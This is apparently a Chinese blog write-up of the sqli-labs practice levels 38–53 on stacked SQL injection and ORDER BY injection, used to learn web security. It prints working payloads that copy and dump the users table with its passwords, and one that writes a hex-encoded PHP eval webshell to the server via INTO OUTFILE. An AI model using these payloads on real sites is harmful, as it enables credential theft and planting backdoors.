堆叠注入

less-38

less-39

less-40

less-41

less-42

less-43

less-44

less-45

考察order by相关注入

less-46

less-47

less-48

less-49

less-50

less-51

less-52

less-53

Stacked injections(堆叠注入):一堆sql语句放在一起执行。

  • 堆叠注入原理:在sql语句中,用分号(;)结束一句sql语句,如果在结束一句sql语句的同时继续构造下一条语句并且执行,就是堆叠注入。堆叠注入可以执行的是任意的语句.

less-38

知道原理后接下来开始测试:

  • ?id=1‘ --+

  • 拼接语句,前一句和后一句用分号隔开

1'; create table A2rcher like users ;--+

数据库中有a2rcher表,说明sql语句执行生效。

  • 1';create table zjh1 like users;insert into zjh1 select *from users; --+

数据就出来了

less-39

与38不同的是闭合方式。

数字型

less-40

第40关报错不回显。

测试了一下闭合方式是('')

less-41

id=1' 没有回显,看了下源码同39

less-42

过滤函数mysqli_real_escape_string()

 $username = mysqli_real_escape_string($con1, $_POST["login_user"]);

 $password = $_POST   ["login_password"];

burp抓包,passwd处修改报错注入

  • 1' and updatexml(1,concat(0x5e,substr((select group_concat(username,0x7e,password) from users),1,31),0x5e),1) #&mysubmit=Login

less-43

闭合方式不同 ('')

less-44

没有回显信息 id=’1‘

less-45

没有回显信息 id=(’1‘)

46-53考察order by相关注入

desc:降序

asc:升序

less-46

'Please input parameter as SORT with numeric value'

用sort代替id传参

  • sort=1

  • sort-2

  • sort=3

sort-4报错

  • 时间盲注猜测字段

less-47

包裹方式的不同,用?sort=1'包裹,其他与Less-46相同

less-48

无包裹,无错误回显,与Less-46相同

less-49

sort=1'包裹,无错误回显,但是这一关可以用outfile上传一句话

奇怪的知识又增加了呢!

使用line terminal by语句 使得一句话木马在结尾部分输出,并且一句话木马要转成十六进制

payload:

?sort=1'into outfile '路径\webshell.php' lines terminated by 0x3c70687020406576616c28245f504f53545b2263726f77225d3b3f3e --+

less-50

报错注入

less-51

用?sort=1'包裹 

法一:延时注入

  法二:报错注入

  法三:写入一句话木马 以上三种方法参考上面。

  法四:使用堆叠注入创建新的users表。

  法五:使用堆叠注入写入一句话木马。

less-52

无包裹,无报错回显

法一:延时注入

  法二:写入一句话木马 以上三种方法参考上面。

  法三:使用堆叠注入创建新的users表。

  法四:使用堆叠注入写入一句话木马

less-53

用?sort=1'包裹

法一:延时注入

  法二:写入一句话木马 以上三种方法参考上面。

  法三:使用堆叠注入创建新的users表。

  法四:使用堆叠注入写入一句话木马。

sqli-labs less38-53(堆叠注入 order by之后相关注入)的更多相关文章

  1. SQLI LABS Basic Part(1-22) WriteUp

    好久没有专门练SQL注入了,正好刷一遍SQLI LABS,复习巩固一波~ 环境: phpStudy(之前一直用自己搭的AMP,下了这个之后才发现这个更方便,可以切换不同版本的PHP,没装的小伙伴赶紧试 ...

  2. Sqli labs系列-less-3 。。。

    原本想着找个搜索型的注入玩玩,毕竟昨天被实力嘲讽了 = = . 找了好长时间,我才发现,我没有 = = ,网上搜了一个存在搜索型注入的源码,我看了好长时间,楞没看出来从哪里搜索注入了....估计是我太 ...

  3. Sqli labs系列-less-2 详细篇

    就今天晚上一个小插曲,瞬间感觉我被嘲讽了. SQL手工注入这个东西,杂说了吧,如果你好久不玩的话,一时说开了,你也只能讲个大概,有时候,长期不写写,你的构造语句还非常容易忘,要不我杂会被瞬间嘲讽了啊. ...

  4. Sqli labs系列-less-1 详细篇

    要说 SQL 注入学习,网上众多的靶场,就属 Sqli labs 这个系列挺不错的,关卡达到60多关了,我自己也就打了不几关,一个挺不错的练习SQL注入的源码. 我一开始就准备等我一些原理篇总结完了, ...

  5. SQLI LABS Challenges Part(54-65) WriteUp

    终于到了最后一部分,这些关跟之前不同的是这里是限制次数的. less-54: 这题比较好玩,10次之内爆出数据.先试试是什么类型: ?id=1' and '1 ==>>正常 ?id=1' ...

  6. 网络安全学习阶段性总结:SQL注入|SSRF攻击|OS命令注入|身份验证漏洞|事物逻辑漏洞|目录遍历漏洞

    目录 SQL注入 什么是SQL注入? 掌握SQL注入之前需要了解的知识点 SQL注入情况流程分析 有完整的回显报错(最简单的情况)--检索数据: 在HTTP报文中利用注释---危险操作 检索隐藏数据: ...

  7. Statement和PreparedStatement的区别; 什么是SQL注入,怎么防止SQL注入?

    问题一:Statement和PreparedStatement的区别 先来说说,什么是java中的Statement:Statement是java执行数据库操作的一个重要方法,用于在已经建立数据库连接 ...

  8. Statement和PreparedStatement的区别; 什么是SQL注入,怎么防止SQL注入? (转)

    问题一:Statement和PreparedStatement的区别 先来说说,什么是java中的Statement:Statement是java执行数据库操作的一个重要方法,用于在已经建立数据库连接 ...

  9. 常见注入手法第二讲,APC注入

    常见注入手法第二讲,APC注入 转载注明出处 首先,我们要了解下什么是APC APC 是一个简称,具体名字叫做异步过程调用,我们看下MSDN中的解释,异步过程调用,属于是同步对象中的函数,所以去同步对 ...

随机推荐

  1. Spring第四天,BeanPostProcessor源码分析,彻底搞懂IOC注入及注解优先级问题!

  2. 03、JDBC范例

    范例:JDBC查询 package com.hsp; import java.sql.Connection; import java.sql.DriverManager; import java.sq ...

  3. 单线程的Redis有哪些慢动作?

    持续原创输出,点击上方蓝字关注我 目录 前言 为什么 Redis 这么火? 键和值的保存形式? 为什么哈希表操作变慢了? 集合的操作效率? 有哪些数据结构? 不同操作的复杂度? 总结 前言 现在一提到 ...

  4. 为什么企业需要CRM系统?CRM的作用及其重要性分析

    客户管理系统(CRM)是企业核心应用软件之一,对于提高企业业绩起着至关重要的作用,现在很多企业都在客户发展方面投入大量的资金,以求获得更好的回报. 关于CRM CRM是一个客户数据中心,在CRM中,你 ...

  5. Java线程的死锁和活锁

    目录 1.概览 2.死锁 2.1.什么是死锁 2.2 死锁举例 2.3 避免死锁 3.活锁 3.1 什么是活锁 3.2 活锁举例 3.3 避免活锁 1.概览 当多线程帮助我们提高应用性能的同时,它同时 ...

  6. 分析一个免杀webshell发现的php特性

    文章首发于t00ls,嫌文章太啰嗦的可以直接看结论 起源 之前看到别人分享的一个免杀webshell: <?php @$GLOBALS{next} = $GLOBALS[$GLOBALS[fun ...

  7. cocoslua3.17 android机器上播放音效不全

    开发过程中遇到一个问题,一个8秒的音效,在android机器上播放不完就结束了:网上说是由于android播放音效的内存限制的:原因知道了,那怎么解决呢? 通过各种搜索查找发现还是解决不了问题,然后自 ...

  8. C++实现任意进制的相互转换

    进制转换是计算机内部时时刻刻都在进行活动,本篇文章也是进制转换的算法介绍,不过不同的是我想利用ascll编码实现2到61之间任意进制的相互转换,更大进制的表示方法只不过是十六进制表示方法的延伸:用字母 ...

  9. web服务器专题:tomcat基础及模块

    Web服务器专题:Tomcat(一)基础架构 针对java系的经典服务器,打算系统的整理一下Tomcat的机制和一些原理,以此记录. 插一则题外话,关于tomat这个名字的由来:Tomcat 名称的由 ...

  10. 【GDOI2007】JZOJ2020年8月10日提高组T1 夏娜的菠萝包

    [GDOI2007]JZOJ2020年8月10日提高组T1 夏娜的菠萝包 题目 Description 夏娜很喜欢吃菠萝包,她的经纪人RC每半个月就要为她安排接下来的菠萝包计划.今天是7月份,RC又要 ...